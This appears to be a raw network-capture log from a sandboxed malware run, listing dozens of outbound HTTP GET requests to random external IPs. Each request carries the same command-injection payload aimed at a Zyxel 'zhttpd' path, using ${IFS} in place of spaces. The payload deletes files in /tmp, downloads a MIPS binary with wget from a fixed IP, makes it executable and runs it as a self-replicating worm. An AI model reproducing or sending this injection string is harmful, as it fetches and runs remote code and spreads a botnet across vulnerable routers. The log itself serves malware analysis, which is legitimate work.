                                      Jan 19, 2024 17:29:52.161508083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9203192.168.2.1449824118.218.74.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161565065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9204192.168.2.1452072110.7.98.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161611080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9205192.168.2.144704280.131.159.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161645889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9206192.168.2.1433014191.119.48.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161678076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9207192.168.2.1448664126.169.19.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161710978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9208192.168.2.1452438133.151.9.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161748886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9209192.168.2.1452850131.136.123.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161781073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9210192.168.2.1434966199.221.254.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161814928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9211192.168.2.143520460.179.243.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161870003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9212192.168.2.144312284.233.54.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161916018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9213192.168.2.143674874.181.235.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.161936998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9214192.168.2.1460312122.218.161.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162009001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9215192.168.2.1434360216.183.22.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162038088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9216192.168.2.1449836132.206.140.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162072897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9217192.168.2.1457970160.115.10.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162111998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9218192.168.2.1458890139.130.180.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162141085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9219192.168.2.1438108196.115.10.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162178040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9220192.168.2.1451536120.208.32.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162230015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9221192.168.2.1455482181.86.144.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162273884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9222192.168.2.1459006222.218.159.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162311077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9223192.168.2.1438666207.186.104.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162355900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9224192.168.2.1443474140.50.253.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162385941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9225192.168.2.1455984222.33.55.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162436008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9226192.168.2.143300452.241.169.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162472963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9227192.168.2.1452514184.1.7.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162508965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9228192.168.2.1456336103.253.163.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162556887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9229192.168.2.1439798152.239.145.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162586927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9230192.168.2.1437318126.62.118.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162627935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9231192.168.2.1460928148.241.86.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162709951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9232192.168.2.1444740184.80.244.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162738085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9233192.168.2.1453972169.170.185.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162767887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9234192.168.2.145879437.121.159.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162796021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9235192.168.2.1449302121.70.5.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162847042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9236192.168.2.14580202.156.223.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162883043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9237192.168.2.1448144115.118.133.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162918091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9238192.168.2.1456344173.189.49.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162951946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9239192.168.2.1448874201.89.27.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.162982941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9240192.168.2.145528412.154.40.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163011074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9241192.168.2.144294465.125.44.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163055897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9242192.168.2.144547639.33.81.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163084984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9243192.168.2.1449862178.40.116.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163121939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9244192.168.2.143435885.18.39.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163166046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9245192.168.2.14485862.39.54.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163182020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9246192.168.2.1433236179.146.51.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163201094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9247192.168.2.1453416165.42.6.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163279057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9248192.168.2.1452810128.7.62.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163297892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9249192.168.2.14556429.220.191.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163330078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9250192.168.2.145738695.254.204.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163372993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9251192.168.2.145797224.195.75.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163407087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9252192.168.2.1452814122.174.201.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163431883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9253192.168.2.1432808136.43.152.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163465023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9254192.168.2.145487667.250.32.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163485050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9255192.168.2.1433218165.54.38.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163521051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9256192.168.2.1457306182.72.179.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163552046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9257192.168.2.1445846193.96.187.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163590908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9258192.168.2.144081446.10.236.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163631916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9259192.168.2.145854050.244.195.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163662910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9260192.168.2.1458492169.120.99.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163722992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9261192.168.2.145531682.17.230.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163738012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9262192.168.2.1444006218.53.4.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163780928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9263192.168.2.1459308206.134.18.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163810968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9264192.168.2.1434450103.105.76.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163841963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9265192.168.2.1454776203.201.105.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:52.163887978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      9266192.168.2.1435296112.22.124.94443
                                      TimestampBytes transferredDirectionData
